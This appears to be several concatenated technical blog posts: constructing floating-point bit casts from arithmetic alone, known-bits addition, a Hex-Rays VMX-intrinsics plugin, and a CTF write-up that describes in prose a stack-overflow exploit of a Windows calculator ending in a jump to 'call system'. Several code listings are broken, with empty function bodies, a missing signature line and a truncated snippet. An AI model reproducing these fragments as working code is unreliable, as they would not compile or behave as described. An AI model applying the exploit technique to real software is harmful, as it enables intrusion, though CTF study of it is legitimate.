• The subnormals ensure that distance between representable numbers only ever decreases as you get closer to zero, so the difference between two sequential values (also known as a “unit in last place” or ULP) is always exactly representable.
• For positive numbers, the floating point value increases with its 64-bit integer representation, so they could be compared as integers, or you can find the next representable value by adding 1 to its int64 representation.

Addition and multiplication of doubles is defined as exact, infinitely-precise, mathematical addition and multiplication. If the exact result can be represented by a double, that double is the result, otherwise rounding occurs. IEEE-754 specifies several rounding modes that can be used, but I’ll focus on the most widely used one “round to nearest, ties to even”. This means that the nearest representable value is used, or if the exact result is half way between two representable values, the value with zero in its least significant `fraction` bit is used. If the infinitely precise result gets too large or too small, it will be rounded to Infinity or -Infinity (see IEEE-754-2008 section 4.3.1 for a formal definition).

Finally, we should consider the special values. If NaN is an input to an addition or multiplication, the result will always be NaN. Multiplication and addition with Infinity or -Infinity will result in other Infinity or -Infinity values, with the exceptions of multiplying Infinity by zero, or subtracting Infinity from Infinity, both of which will result in NaN.

## Notation

From this point onward, this is an attempt at something like literate programming, presented in essentially the order I created it, starting with just multiply, add and subtract, then building progressively more powerful functions. The code was written as C++, and has been refactored to simplify the explanation. I do make use of loops and functions, but only where they can be completely unrolled or inlined by the compiler.

I’ve omitted the function `double p2(int e)`, which provides a power of two – everywhere it is used it gets inlined as a constant, but the easiest way to ensure this was to use a lookup table with 2098 values.

The macro `CONSTEXPR` is defined as follows, mostly to allow adjustments to inlining, or removing the `constexpr` keyword from everything easily:

```#define CONSTEXPR \
constexpr static inline __attribute__((always_inline))
```

Throughout this text I’ve used `exponent` to mean the encoded exponent bits in a double, as opposed to the unbiased/decoded exponent (`exponent - 1023`). Hopefully that’s not too confusing.

## Logic Operations

I started by investigating what you can do with only addition and multiplication. Supposing “true” is 1.0 and “false” is 0.0, I implemented some logic operations:

```CONSTEXPR double double_and(double a, double b) {
return a * b;
}

CONSTEXPR double double_not(double a) {
return 1 - a;
}

CONSTEXPR double double_or(double a, double b) {
return a + b - a * b;
}

CONSTEXPR double select(
double condition, double if_true, double if_false) {
return condition * if_true + double_not(condition) * if_false;
}
```

These are mostly presented without further comment, as they can be tested exhaustively. However `select` is where things get a bit tricky. Because `Infinity * 0 = NaN` and `NaN + anything = NaN`, we can never ignore Infinity values and must be meticulous about never performing operations that could create them.

## Avoiding Infinities

Given I want to convert an arbitrary floating point number to its bitwise representation, I had to start by figuring out what operations I could do on any floating point number without risking creating an Infinity.

One option here is multiplying by values between 1.0 and -1.0 inclusive as the result will never increase in magnitude. This works in any rounding mode.

We can also add any constant value between `p2(969)` and `-p2(969)` exclusive, as this will not round to infinity when added to the positive or negative values of greatest magnitude. However, this only works in round-to-nearest or round-toward-zero modes, as round-toward-positive and round-toward-negative may round to Infinity when adding even the smallest non-zero value.

## An Initial Comparison

I figured I would need to construct `(x == y)` and `(x < y)` comparisons – something that would give me a boolean 0.0 or 1.0 that I could use with my logic functions. But I couldn’t even come up with a way to compute `(x == 0)`. So I instead started with the question: what boolean value can I create?

Consider floating point addition of the smallest positive value (`p2(-1074)`) to a number. If `exponent` (the value of the encoded bits) is zero or one, this value is the ULP (distance between subsequent representable floating point values), so the result will be exact. When `exponent` is two, the ULP is doubled, so the exact result will land between two representable values, so it will “round to even”, and either round up (adding `p2(-1073)` instead) or round down (leaving the value unchanged). Finally, if the `exponent` is four or above, the exact result of the addition will never reach the midpoint between representable values, so rounding to nearest will leave the value unchanged.

That explanation doesn’t completely cover the boundaries between `exponent` values. Importantly, when adding `p2(-1074)` to the negative number with `exponent` two and fraction zero, the result will have `exponent` one, and therefore is exactly representable (although the same is not true for the corresponding positive number).

So, supposing we compute `x + p2(-1074) - x` we will get either `p2(-1074) * 2` or `0` if there was rounding, or `p2(-1074)` if the result of the addition is accurate.

This can be turned into a boolean like so:

```CONSTEXPR double adding_smallest_is_precise(double x) {
double add_error = x + p2(-1074) - x;

// add_error is in {0, p2(-1074), 2 * p2(-1074)}

// add_error is in {-p2(-1074), 0, p2(-1074)}
// divide by p2(-1074), by multiplying by p2(1074). p2(1074) is
// out of range, so multiply by its square root twice instead.

// add_error is in {-1, 0, 1}

// add_error is in {1, 0, 1}
}
```

This function computes `-p2(-1021) <= d < p2(-1021)`, which is enough to start constructing other comparisons.

However, this comparison is frustratingly asymmetric, so we’ll compute `-p2(-1021) < d < p2(-1021)` as follows. This is equivalent to checking if the `exponent` is zero or one.

```CONSTEXPR double is_exp_0_or_1(double x) {
}
```

## Equality Comparisons

To start with, it’d be good to compute `x == 0`. We can now do that by taking the minimum and maximum values that satisfy `is_exp_0_or_1` and checking that `x + v` still satisfies `is_exp_0_or_1` for both:

```CONSTEXPR double is_zero(double x) {
double magic = p2(-1021) - p2(-1074);
return double_and(is_exp_0_or_1(x + magic),
is_exp_0_or_1(x - magic));
}
```

This works, and is Infinity-safe, as the magic number is nowhere near the limit of `p2(969)`. It also gives us a way to implement `x == y`, by checking `is_zero(x - y)`. However, `x - y` may be Infinity, so we must first implement a safe subtraction operation for comparisons:

```CONSTEXPR double cmp_sub(double x, double y) {
// return a number with the same sign as x-y (or zero
// if x-y==0), while avoiding returning infinity.

double small = double_or(is_exp_around_0_or_1(x),
is_exp_around_0_or_1(y));
double multiplier = (small + 1) * p2(-1);
return (x * multiplier) - (y * multiplier);
}
```

If either value has a tiny `exponent`, then `x - y` cannot become infinite. However, if both values have an `exponent` >= 2, multiplying by `p2(-1)` will be lossless (it just subtracts 1 from the `exponent`). As such, the result will be zero when `x == y`, will be positive when `x > y` and will be negative when `x < y`. So we can test equality like so:

```CONSTEXPR double is_equal(double x, double y) {
return is_zero(cmp_sub(x, y));
}
```

Unfortunately, we still don’t have a way to calculate `x < 0` (which would give us `x < y`), but we’ll get back to that later.

## Getting the Exponent

If we want to convert a double to its bitwise representation, we’ll need to extract its encoded exponent. So far, we can check if the `exponent` is zero or one.

We can use that to build a test for if the `exponent` is zero (i.e. the value is a subnormal), by adding constants that shift values with `exponent` one outside of the range:

```CONSTEXPR double is_exp_0(double x) {
return double_and(is_exp_0_or_1(x + p2(-1022)),
is_exp_0_or_1(x - p2(-1022)));
}
```

The other thing we want is to multiply by negative powers of two. This will subtract a constant from the `exponent` (leaving the fraction unchanged), unless the `exponent` reaches zero, in which case rounding will occur (possibly rounding up to a value with `exponent` one). This can be used to build tests for if the `exponent` is less than a given value. For example, `is_exp_0_or_1(v * p2(-1024))` will be true if the `exponent` is less than 1024 + 2.

This can be used to binary search the value of the `exponent`:

```CONSTEXPR double get_encoded_exponent(double v) {
double tmp = v;
double e = 0;

#pragma unroll
for (int test = 1024; test >= 1; test /= 2) {
double trial = tmp * p2(-test);
double too_small = is_exp_0_or_1(trial);

tmp = select(too_small, tmp, trial);
e += select(too_small, 0, test);
}

return select(is_exp_0_or_1(v), double_not(is_exp_0(v)), e + 2);
}
```

This will check if the encoded exponent is less than 2 + 1024, and if not, it’ll subtract 1024 from the encoded exponent (by multiplying by `p2(-1024)`), and add 1024.0 to our exponent value. This is repeated with smaller powers of two, until we know that the remaining encoded exponent is 0, 1, or 2, and the `e` variable will contain the amount subtracted. Finally, it uses the `is_exp_0_or_1` and `is_exp_0` functions to handle the zero and one cases explicitly.

## Complete Comparisons

This is a great step towards bitwise casts, but `tmp` in `get_encoded_exponent` is interesting. By the end of the function, we’ve preserved its `sign` and `fraction` bits, but its `exponent` has been converted to only 0, 1, or 2. This makes the challenge of testing `x < 0` much simpler.

We can easily define a `make_exp_0_or_1` function, that does the same thing, but also halves values that were left with `exponent` two:

```CONSTEXPR double make_exp_0_or_1(double v) {
double res = v;

#pragma unroll
for (int test = 1024; test >= 1; test /= 2) {
double trial = res * p2(-test);
res = select(is_exp_0_or_1(trial), res, trial);
}

return select(is_exp_0_or_1(res), res, res * p2(-1));
}
```

Now we can add a constant to shift all non-negative values out of the zero-or-one `exponent` range, such that only values less than zero pass the `is_exp_0_or_1` test.

```CONSTEXPR double is_less_than_zero(double v) {
return is_exp_0(make_exp_0_or_1(v) + p2(-1022));
}
```

And, using our `cmp_sub` from earlier, we can compute `(x < y)`:

```CONSTEXPR double is_less_than(double a, double b) {
return is_less_than_zero(cmp_sub(a, b));
}
```

## Floor

The final tool we need before we can put together out bitwise casts is `floor`. For this, we’ll consider only numbers between zero and `p2(52)`, and we’ll use a trick I’ve seen in the past (e.g. in musl libc’s floor.c). The trick is to add and subtract `p2(52)`. Within the range `p2(52)` to `p2(53)`, the ULP is exactly 1, so `x + p2(52) - p2(52)` performs a round-to-nearest-integer operation. From here, we can simply check if it rounded up, and subtract 1 if it did:

```CONSTEXPR double small_positive_floor(double v) {
// WARNING: incorrect for negative numbers and some
// values over p2(52)
// (but works for zero despite the name)
double r = v + p2(52) - p2(52);
return select(is_less_than(v, r), r - 1, r);
}
```

This lets us extract specific bits from a floating point integer. Specifically, I use the following idiom to split `n` low bits from an integer `x`: `high_part = floor(x * p2(-n)); low_part = x - high_part * p2(n);`

## Double to bits

So, how close are we to converting a double to its bits? `get_encoded_exponent` gives us the exponent bits. `is_less_than_zero` gives us the sign bit.

For the fraction, `make_exp_0_or_1` has given us all the fraction bits, but preserved the sign, and the implicit leading `1` if the number isn’t subnormal.

We can clear the sign bit by multiplying by `-1` if the value is negative. We can subtract the implicit leading `1` if the value isn’t subnormal to be left with only the fraction bits, and then scale it up by `p2(1047)` so that a fraction of `1` is `1.0`:

```CONSTEXPR double get_fraction(double v) {
double result = make_exp_0_or_1(v) *
select(is_less_than_zero(v), -1, 1);
result -= select(is_exp_0(v), 0, p2(-1022));
result = result * p2(1074 / 2) * p2(1074 / 2);
return result;
}
```

This gives us a 1-bit `sign` value, an 11-bit `exponent` value, and a 52-bit `fraction` value (all stored as integers within doubles), so we just need to split that into two 32-bit values.

These traditionally bitwise ops are written using multiplication by powers of two as a constant shift (with floor to truncate the result), addition to set bits (instead of bitwise “or”), and subtraction to clear bits (instead of bitwise “and”):

```struct low_high_doubles {
double low;
double high;
};

CONSTEXPR struct low_high_doubles constexpr_double_as_ints(double v){
double sign = is_less_than_zero(v);
double exponent = get_encoded_exponent(v);
double fraction = get_fraction(v);

double high_fraction = small_positive_floor(fraction * p2(-32));
double high = sign * p2(31) + exponent * p2(20) + high_fraction;
double low = fraction - high_fraction * p2(32);
return { low, high };
}
```

## Bits to double

To convert bits to double, we can roughly follow the inverse. This is conceptually a bit simpler, so it’s only explained lightly in the comments:

```CONSTEXPR double double_from_sign_exp_fraction(
double sign, double exponent, double fraction) {
double exp_is_non_zero = double_not(is_zero(exponent));

// scale fraction down to exponent 0
double v = fraction * p2(-1074);

// add the implicit leading one if needed (so exponent = 1)
v += select(exp_is_non_zero, p2(-1022), 0);

// compute how much we need to increment the exponent by
double e = select(exp_is_non_zero, exponent - 1, 0);

// shift it so that all but the first bit is after the point
e *= p2(-10);

#pragma unroll
for (int test = 1024; test >= 1; test >>= 1) {
// cond will be 1 if the relevant bit is set, otherwise 0
double cond = small_positive_floor(e);

// clear the current bit and shift the next bit into the
// ones place
e = (e - cond) * 2;
if (test == 1024) {
// p2(1024) is unrepresentable, so multiply by its
// square root twice
v *= select(cond, p2(512), 1.0);
v *= select(cond, p2(512), 1.0);
} else {
v *= select(cond, p2(test), 1.0);
}
}

// generate a NaN value if one is expected.
double is_nan = double_and(is_equal(exponent, 2047),
double_not(is_zero(fraction)));

// if it's a NaN, "v" will already be Infinity, so multiply by
// zero to make it NaN, otherwise multiply by one to leave it
// as-is.
v *= double_not(is_nan);

// set the sign bit
v *= select(sign, -1, 1);

return v;
}
```

Finally, we just need to extract the sign, exponent and fraction fields from the high and low unsigned 32-bit integers:

```CONSTEXPR double constexpr_ints_as_double(double l, double h) {
double exp_and_sign = small_positive_floor(h * p2(-20));

double sign = small_positive_floor(h * p2(-31));
double exponent = exp_and_sign - sign * p2(11);

double fraction = (h - exp_and_sign * p2(20)) * p2(32) + l;

return double_from_sign_exp_fraction(sign, exponent, fraction);
}
```

The code presented above is true to my initial implementation, but ends up quite bloated, compiling to around 5000 add, subtract or multiply operations (assuming it’s all inlined and unrolled). You can see it on Compiler Explorer or gist.

## “Dirty” floor trick

Perhaps that would be a good place to leave it, but I tried to optimise the number of operations it a little. To decrease the size to something comparable to what’s shown in the initial Javascript (around 368 operations), a number of less safe or less clear functions and techniques are used.

The biggest problem is `floor`, which requires the `make_exp_0_or_1` operation every time (binary searching the exponent takes a fair number of instructions). In every situation we use “floor” we know a lot about the range of the value, and the number of bits present after the point. This lets us implement `floor` without a comparison, by just biasing the input numbers such that round-to-nearest-ties-to-even will round down.

```CONSTEXPR double dirty_floor(double v) {
// for values between 0 and 0x100000 with up to 32 significant bits
// after the "decimal" point.
return v - (0.5 - p2(-33)) + (p2(52)+1) - (p2(52)+1);
}
```

This might be the most complex trick, so to explain a little more: ignoring edge cases we could say that `floor(x) == roundToNearestEven(x - 0.5)`. But the “edge case” here is integers, which will end up exactly between two integers, so round-to-even will round half of all integers down, giving the wrong result.

We can get the right result by subtracting slightly less than 0.5 instead. How much less? Well, it can’t make any other value land on 0.5, so it must be smaller than the smallest distance between possible inputs. But it also can’t get rounded off, so it must be at least the ULP for the biggest possible input.

This is impossible to solve if you have 53 significant bits, but fortunately we don’t. The constant chosen works out exactly for our 52-bit fraction being shifted right by 32, and happens to work everywhere else, as there are both fewer significant bits and no larger values.

## More tweaks

Revisiting the initial comparison, a cheaper symmetrical boolean test was found. This computes `-p2(-1021) <= d <= p2(-1021)` (i.e. the same as `is_exp_0_or_1` but including one value on either side).

```CONSTEXPR double is_exp_around_0_or_1(double v) {
double biased = v - p2(-1074);
return (biased + p2(-1074) - biased) * p2(1074 / 2) * p2(1074 / 2);
}
```

(This can be analysed case-by-case, but essentially the initial bias both makes it symmetrical, and prevents a subsequent round-to-even from ever rounding away from the biased value, simplifying the conversion to boolean.)

We can go a bit further to try to replace `is_exp_0_or_1` by multiplying the input by the smallest double greater than one. Unfortunately, this can generate Infinity when called on arbitrary values, but we can use it on all but the first iteration of our exponent decreasing loops.

```CONSTEXPR double unsafe_is_exp_0_or_1(double v) {
// only works for non-huge numbers
return is_exp_around_0_or_1(v * (p2(0) + p2(-52)));
}
```

We can use much coarser comparisons when we know a number is either zero or a long way from zero, as we do when comparing the “exponent” or “fraction” values:

```CONSTEXPR double is_integer_zero(double v) {
return (v + p2(-1022) - v) * p2(1022);
}

CONSTEXPR double is_small_integer_equal(double a, double b) {
return is_integer_zero(a - b);
}
```

Despite the names, I can and did use these method on non-integers without worrying, when I knew they were well above roughly `p2(-900)` (around which we might have to worry about the addition being accurate for a non-zero value).

Finally, there were just a lot of little simplifications that the compiler cannot perform. A lot of duplicate work was removed by computing `sign`, `exponent` and `fraction` at the same time in one big function. Throughout the code, `select(cond, x, y)` with constant x and y could often be written as `(x - y) * cond + y`, which simplifies even further if `y` is zero. And there were plenty of other algebraic simplifications of little note.

You can find my optimised code on Compiler Explorer or gist. (Although this doesn’t quite match the code in this post, it should match the Javascript at the top closely.)

The Javascript was generated by compiling the optimised code with `clang++ -O2 -fno-slp-vectorize -march=skylake -std=c++14 -fomit-frame-pointer -S`, which generated an assembly file containing a stream of `vaddsd`, `vsubsd` and `vmulsd` instructions, as well as `vmovsd` instructions to load constants. These instructions were translated into Javascript using a terrible Python script.

## Future work

As noted, this was a completely pointless exercise, but it does open up some avenues for further pointless exercises:

• Can it be generalised to work for `float` as well (splitting to two 16-bit values)?
• Can it be extended to other rounding modes? All other rounding modes?
• Are there simpler or smaller implementations of the various operations used?
• Could it be turned into a reasonable expression, with no variables, just nested additions and subtractions? Doing so naively gives multi-gigabyte results, but no effort was made to optimise for this.
• This roughly shows that any function from finite doubles to finite doubles can be implemented. How hard is it to approximate division? How many operations would it take to implement correctly rounded division?

I’d also like to generate a version of the Javascript where all the constants are synthesised from “2.0” and “0.5”, so as to try to be portable to restricted environments with potentially inaccurate floating-point constant parsing.

As I was mostly exploring this for fun, I used very little by way of references, but here are a couple of somewhat related things I quite like:

• mov is Turing Complete (Stephen Dolan) and the movfuscator (Christopher Domas) (github, talk)
• Handbook of Floating-Point Arithmetic (Jean-Michel Muller, Nicolas Brunie, Florent de Dinechin, Claude-Pierre Jeannerod, Mioara Joldes, Vincent Lefèvre, Guillaume Melquiond, Nathalie Revol, Serge Torres)

Anyway, thanks for reading! Let me know if you find any mistakes. You can follow me on Twitter at @dougallj.

# Bit-Twiddling: Addition with Unknown Bits

(If you can’t read the code in this post on mobile, try this wrapped version instead, sorry)

Suppose you have two values. You know some bits are zero, some bits are one, other bits could be either. You can add together those two values to get another such partially-known value, determining as precisely as possible which bits can be known and which cannot. This operation is common in optimising compilers and program analysis, and it has some interesting properties that I’ll circle back to, but first here’s my implementation of the addition operation described above:

```  struct known_bits {
unsigned ones;
unsigned unknowns;
};

struct known_bits b) {
struct known_bits result;
unsigned x = a.ones + b.ones;
result.unknowns = a.unknowns | b.unknowns |
(x ^ (x + a.unknowns + b.unknowns));
result.ones = x & ~result.unknowns;
return result;
}```

This function compiles to about 12 instructions, the assembly for which fits in a tweet. But let’s look at the theory behind it all.

## Representation

A perhaps surprising amount of thought went into that simple-looking structure.

Each partially known value is a ternary number (with digits zero, one and unknown), so for a 32-bit number, there are 332 possible values. This requires more than one 32-bit value to represent, but can be comfortably represented with two or three 32-bit values. Initially, I stored “known ones” and “mask”, where the mask was set for all known bits. After figuring out most of my functions, I realised I could remove a significant number of bitwise nots by storing the unknown bits instead of known bits.

I could also store a third value, “known zeroes”, but this can be calculated if needed by the expression ~(v.ones | v.unknowns), and it seemed error prone to make the representation more redundant.

## Theory

But that’s enough about code – let’s get back to some maths. Each value can be thought of as a lossy representation of a set of possible numbers. The size of this set is given by 2popcount(unknowns) (meaning if there are no unknown bits it represents a single value, or if there are two unknown bits it represents four possible values).

The representation is lossy. It would take 232 bits to represent an arbitrary subset of the 32-bit integers, and I’m only storing 64 bits. For example, consider the set {000, 011}. This is represented as 0UU (maximising for precision), which represents the superset {000, 001, 010, 011}.

In some sense, the most fundamental operation is the “union” operation:

```   r.ones = a.ones & b.ones;
r.unknowns = a.unknowns | b.unknowns | (a.ones ^ b.ones);```

This combines two sets, such that only bits which are known to be the same are known in the result.

The other fundamental operation is iteration. This is done by iterating over values up to the set size (2popcount(unknowns)), and distributing those bits to the unknown bit locations. This can be written efficiently using a technique described in Fabian Giesen’s Texture tiling and swizzling.

Using these two operations, we can define an algorithm for computing the maximally precise known bits after any operation. As a pseudocode example:

```  r = known_value(op(a.ones, b.ones))
for each possible a as A
for each possible b as B
r = union(r, known_value(op(A, B)))```

This has an exponential runtime, so it’s entirely impractical, but I quite like it as a mathematical definition of the best possible result, and it can be useful for quickly testing better algorithms.

## Some Bitwise Operations

Bitwise operations have relatively simple definitions. A nice example is or:

```  r.ones = a.ones | b.ones;
r.unknowns = (a.unknowns | b.unknowns) & ~r.ones;```

Any known ones in either input will be known ones in the output, known zeroes in both inputs will give a known zero output, and anything else is unknown. For example: 00011U | 0U1U1U = 0U111U.

Another example is xor.

```  r.unknowns = a.unknowns | b.unknowns;
r.ones = (a.ones ^ b.ones) & ~r.unknowns;```

Any unknowns in either input will be unknown, but any two known values are xored. For example: 00011U ^ 0U1U1U = 0U1U0U.

It’s worth remembering that xor is basically addition without the carry.

Coming back to addition, there are a few things worth noting. Firstly, our addition is not associative, for example:

```  (0001 + 0001) + 000U = 0010 + 000U = 001U
0001 + (0001 + 000U) = 0001 + 00UU = 0UUU```

The addition algorithm shown above comes from a few logical ideas. Firstly, any unknown bit in either input will be unknown in the output (because it can change the result bit in the same location). Secondly, some carry bits may also become unknown, possibly a whole run of them. These unknown bits can be determined by finding difference between the maximum possible sum and the minimum possible sum.

The minimum value in a given set is a.ones and the maximum is a.ones | a.unknowns. So the initial algorithm was:

```  struct known_bits kb_add(struct known_bits a,
struct known_bits b) {
struct known_bits result;
result.unknowns = a.unknowns | b.unknowns |
((a.ones + b.ones) ^ ((a.ones | a.unknowns) +
(b.ones | b.unknowns));
result.ones = (a.ones + b.ones) & ~result.unknowns;
return result;
}```

Alternately, the maximum can be represented as (a.ones + a.unknowns) because no bits are set in both a.ones and a.unknowns, so the addition will never carry. This representation allows the following transformation to the function above:

```    (a.ones | a.unknowns) + (b.ones | b.unknowns)
= (a.ones + a.unknowns) + (b.ones + b.unknowns)
= (a.ones + b.ones) + a.unknowns + b.unknowns```

The (a.ones + b.ones) expression now appears in three places, so we calculate it ahead of time to simplify things, giving the function shown at the top.

## Questions

Can you prove or disprove the addition function? I can’t find a counter-example when exhaustively searching 8-bit values, but that’s not really a proof.

Can you compute the known-bits for multiplication? It’s easy to start getting useful results, but I would love to see a maximally precise less-than-exponential-time algorithm. Can it be proven that that’s impossible?

Can it be simplified further? John Regehr has had interesting results in program synthesis along these lines (which is what reminded me to post this – thanks!)

Update: if you want to play with implementing different operations, I’ve put some test code in a gist, based on a gist by @zwegner. It includes an implementation of subtraction.

# Writing a Hex-Rays Plugin: VMX Intrinsics

I’ve been very excited to work with the new Hex-Rays Decompiler microcode API, and I’ve finally had the chance to sit down and build a useful plugin. This post describes the development process: the things I tried that didn’t work and the weird hacks that ultimately did.

The plugin (C++ code) is available on Github at https://github.com/dougallj/dj_ida_plugins/blob/master/dj_vmx_intrinsics/dj_vmx_intrinsics.cpp

## Example output

Without the plugin:

With the plugin:

Original source for reference:

``` uint64_t update_rip(uint64_t new_rip) {
uint64_t old_rip;
if (__vmx_vmwrite(GUEST_RIP, new_rip) != 0)
return 0;
return old_rip;
}```

## Hex-Rays API

The Hex-Rays API consists of a single header file, hexrays.hpp, which is the primary source of documentation, as well as a collection of examples, which are very useful.

Adding new intrinsics is similar to example 8 (hexrays_udc.cpp, not published online), but the assumes the call takes arguments in fixed registers, whereas intrinsics generally take their arguments from the instruction’s operands. This presented a significant challenge, as I could not rely on the udc_filter_t infrastructure to generate helper calls.

## Dumping microcode

The hexrays_sample9.cpp example shows how to dump microcode. By dumping microcode at different maturity, you can see how the decompiler is generating, optimizing and simplifying code. This was my most useful tool. I found examples of intrinsics already being generated, dumped the generated microcode, and wrote code to produce roughly the same microcode for other instructions.

There is one big problem with this, though. The code to display the microcode as a string is not public, so I had a hard time understanding how the human read-able representation mapped to the underlying C++ structures I had to generate. I modified the example code with a lot of one-time print debugging to dump out the structures, alongside the string representations, so I could see what was going on.

## Defining instructions

Unhandled instructions show up as __asm blocks in the decompiler output, but are represented by the ext opcode in the microcode. I originally tried writing an optinsn_t handler to translate ext instructions to helper calls (based on the Hex Blog post Deobfuscating xor’ed strings). This worked, but the _RDX style register names were still present and were not propagated into the call arguments, which undermined a lot of the purpose. I assume this information is tracked separately.

Instead I used a microcode_filter_t. During a apply(codegen_t& cdg) callback, I add new opcodes to the codegen_t‘s “mblock_t mb member, which allows generating arbitrary microcode for instructions.

## Temporary registers

The __vmx_vmwrite intrinsic (and most others), return 0, 1, or 2, to represent the combination of flags indicating the status of the operation (see __vmx_vmwrite on MSDN for more information). As such, I wanted to move the result to a temporary register, and set the flags based on that value:

```mov call !__vmx_vmwrite<fast:"size_t" r9.8,"size_t" rax.8>.1, tt.1
setz tt.1, #1.1, zf.1
setz tt.1, #2.1, cf.1```

The tt register is a temporary used by the Hex-Rays x86-64 microcode emitter, but I couldn’t find a way to access it in the API. I ended up using the mop_t::dstr function to get the string representation of every register, then hardcoded the resulting value:

`const mreg_t mr_tt = mreg_t(0xC0);`

This is presumably a very fragile approach – let me know if you can recommend a better alternative.

## Side-effects

I originally had no problems with my intrinsic call being optimized away, but as soon as I moved it into the tt register, the pre-optimizer pass (and I think other passes) started deleting calls if the result was unused (even though the FCI_NOSIDE flag was not set). To work around this I chose to make my intrinsics appear to spoil memory.

Again, I couldn’t figure out how to spoil GLBLOW and GLBHIGH, so I ended up hardcoding GLBLOW based on dumping values from another instruction, which the debug-printer showed as spoiling it.

There are quite a few functions defined in the hexrays.hpp header that do not link (although I expect this will be fixed soon), and mlist_t::add(const ivl_t &) was one of them, so I had to add it to the mlist_t‘s underlying ivlset_t directly:

```ivl_t glblow(0, 0x100000);

## Taking the address of registers

The __vmx_vmread intrinsic takes an output pointer as the second parameter. But the instruction can write its output to a register. Hex-Rays provides an operand type (mop_a/mop_addr_t) which should work for this but I had aliasing problems which I couldn’t figure out. (Writing to “rax” then using “al” would appear as two different variables for some reason.)

Instead, I chose to generate a __vmread which writes the result value to the destination register or memory, and to simply undefine the cf and zf flags (using m_und). This means that if the return value is used, references to undefined variables will show up in Hex-Rays with comments (at the top of the function) showing them to map to cf and zf. But in the common case where the return value is ignored the resulting pseudocode is nicer (and correct).

## Accessing operands

x86-64 operands can be fairly complex. The Hex-Rays API provides an abstraction for this in the form of the function mreg_t codegen_t::load_operand(int opnum), which can load an operand to a microcode register from an assembly register. However, it cannot store an operand, nor can it get the address of an operand.

To avoid re-implementing full operand decoding, I call load_operand then mutate the output to either store, instead of load, or to get the address instead of accessing memory. This is not a solid choice, and there may be some edge cases where this causes real problems, but due to the way temporary registers are used by the microcode generator it should be work for the expected operand types.

## Future work

Currently, when we decompile “return __vmx_vmwrite(…);” we end up with the confusing (but correct):

```v1 = __vmx_vmwrite(...);
return (v1 == 2) + (v1 == 2) + (v1 == 1);```

Fixing this should be possible, since we know “v1” is either 0, 1, or 2, but it’s not clear how best to do it. Possibly this is a good case for an optinsn_t callback.

There are a few TODOs in the code. A few of the types aren’t currently correct, but not in ways that should cause problems, and it would be good to have an option to generate the correct __vmx_vmread (as discussed in “taking the address of registers” above).

I also hope to make the plugin more solid in the future, if I can find safer ways to do some of the things described above.

## Final notes

A huge thanks to everyone at Hex-Rays for releasing this. I love being able to understand the internals of the decompiler and to develop plugins to make reverse engineering easier in various situations.

All in all, this seems to work, but given the hacks described above it isn’t likely to be 100% solid. Hopefully future revisions of the Hex-Rays API will improve the documentation, add more examples, and possibly provide higher-level interfaces to make plugins like this easier.

The same technique can be used to change the code generation for a wide variety of instructions, and to help with all sorts of problems. You can add new intrinsics for almost anything, or modify existing ones, such as rewriting __readgsqword(0x188) calls to KeGetCurrentThread(). There are a lot of useful possibilities. I hope my example code is helpful, and I hope that others writing Hex-Rays plugins will take the time to release example code.

The code can be found at https://github.com/dougallj/dj_ida_plugins/blob/master/dj_vmx_intrinsics/dj_vmx_intrinsics.cpp and you can find me on Twitter at @dougallj.

# Quick Writeups from Teaser CONFidence CTF 2017

Over the weekend I played the Teaser CONFidence (Dragon Sector) CTF with 9447. These are my writeups on all the challenges I solved, for the benefit of the rest of my team. Perhaps also of interest to the challenge authors and other participants, but definitely not the most interesting writeups.

## Fastcalc (Pwning, 500)

I was pretty happy to get “first blood” on this challenge, but unfortunately solving a challenge quickly often means solving it without a thorough understanding, so it’s not going to be a brilliant writeup.

This was a 32-bit Windows challenge which provided a simple calculator.

I started reversing in IDA. It had a conspicuous call to system(“echo Fastcalc…”) near the top of the function, surrounded by normal IO functions (probably C++, but could be C – I didn’t pay too much attention). So I had some idea of where I’d end up jumping, and that I should be trying to get eip control. The code also, somewhat strangely, uses fibers to transfer control flow. Fortunately I’d recently learnt about them elsewhere, and they had very little to do with my solution to the challenge itself.

The code allowed construction of “new” expressions, followed by execution of expressions. The parser accepted only doubles, the usual four arithmetic operators (+ – * /) and parentheses, and had some notion of precedence. I believe the parser essentially converted from the usual infix form represented by characters (“1+2*3”) to a postfix form stored in structures in memory (“1 2 3 * +”).

I reversed the structures, and the function that output them, as follows:

```struct ParseNode
{
double double_or_byte;
_DWORD is_operator_byte;
};

struct ParseNodes
{
_DWORD num_nodes;
ParseNode nodes[256];
};
void __cdecl append_double_or_byte(int a1, char a2, double a3, ParseNodes *a4)
{
a4->nodes[a4->num_nodes].is_operator_byte = a1;
if ( a1 )
LOBYTE(a4->nodes[a4->num_nodes].double_or_byte) = a2;
else
a4->nodes[a4->num_nodes].double_or_byte = a3;
++a4->num_nodes;
}

```

I noticed that this does not do any kind of overflow checking, and this structure is allocated on the stack of the wmain function. So I had a look at some of the following values in memory and formed a theory that I could get it to write a pointer into a double and leak it back to me as the result of an expression (e.g. 0+0+0+0+0+0…).

I tried this, and overflowed the stack a bit, but when I ran the expression it just dumped out a lot of stack memory as the expression name. I had no idea why, and I solved the challenge without knowing. (But I now propose it was caused by corrupting an std::string structure, which can have inline data or dynamically allocated data. It probably didn’t corrupt the length, but changed what I presume is the “capacity” field so that the string looked inline for its data. I get to std::strings in a minute.)

I later figured out a way to make my original idea work too, but it was much less useful than the stack leak, so I forgot about it.

I noticed the stack had a cookie, which meant it was unlikely that we could get eip control that way, and wasted a bit of time trying to reason about what was on the stack that I could poke. It amounted to mostly a bunch of strings, and not much of interest, so I went back to the “stack overflow” approach, hoping that it would be possible due to the uninitialised gaps often left in the 16-byte structures I was overflowing.

I initially tried to skew the postfix tree so that it would be all controlled values followed by all operators “0+(0+(0+(0+0)))” -> “0 0 0 0 0 + + + +”, but quickly found that that wrote past the bottom of the stack and crashed, so I switched to an approach where I did “0+0+0+0+0” until I got past the end of the main buffer, then switched to the contiguous doubles at the end of the sequence.

This worked but produced a bunch of useless crashes long before returning from the function, apparently freeing some std::string structures. I reversed a bit and figured that if I sprayed a value less than 0x10 it wouldn’t try to free the memory, so I changed to spray with the double value that was encoded as 0F 00 00 00 0F 00 00 00, which ended up with eip = 0xF. Awesome!

I switched to using more interesting values and discovered a problem where the low bits of my doubles were getting corrupted. To my surprise this was caused by rounding in pythons str implementation. Switching to repr fixed it. Lesson learned.

The stack layout meant that I controlled one more DWORD (the other half of a double) on the stack after the return address. If I returned directly to the system function, that would be interpreted as the return address (from system), but by returning to the instruction “call system” it gets treated as the argument – a pointer to a string.

